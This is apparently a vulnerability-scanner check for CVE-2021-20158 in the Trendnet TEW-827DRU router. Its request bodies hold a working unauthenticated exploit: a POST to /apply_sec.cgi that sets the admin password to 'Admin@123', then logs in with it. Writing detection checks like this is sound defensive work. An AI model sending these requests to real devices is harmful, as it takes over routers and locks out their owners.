metadata:
	language: v1-beta
	name: "CVE-2021-20158 Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change"
	author: "Parimal Shaw"
	description: "Check for CVE-2021-20158."
	tags: "CVE-2021-20158"

run for each:
    potential_body = 
	"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=Admin@123",
	"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=QWRtaW5AMTIz&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id="

define:
    potential_path = "/apply_sec.cgi"


given host then
    send request called check:
		method: "POST"
		path: {potential_path}
		body: {potential_body}

			if {check.response.status_code} is "200" 
			and "setConnectDevice" in {check.response.body} 
			and "setInternet" in {check.response.body} 
			and "setWlanSSID" in {check.response.body}
			and "TEW-827DRU" in {check.response.body} 
			and "text/html" in {check.response.headers} then
					report issue:
						severity: high
						confidence: certain
						detail: "Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.(Currently the admin Password have been chnaged to 'Admin@123')"
						remediation: "Upgrade to Latest Version or implement proper access control to the following command"
			end if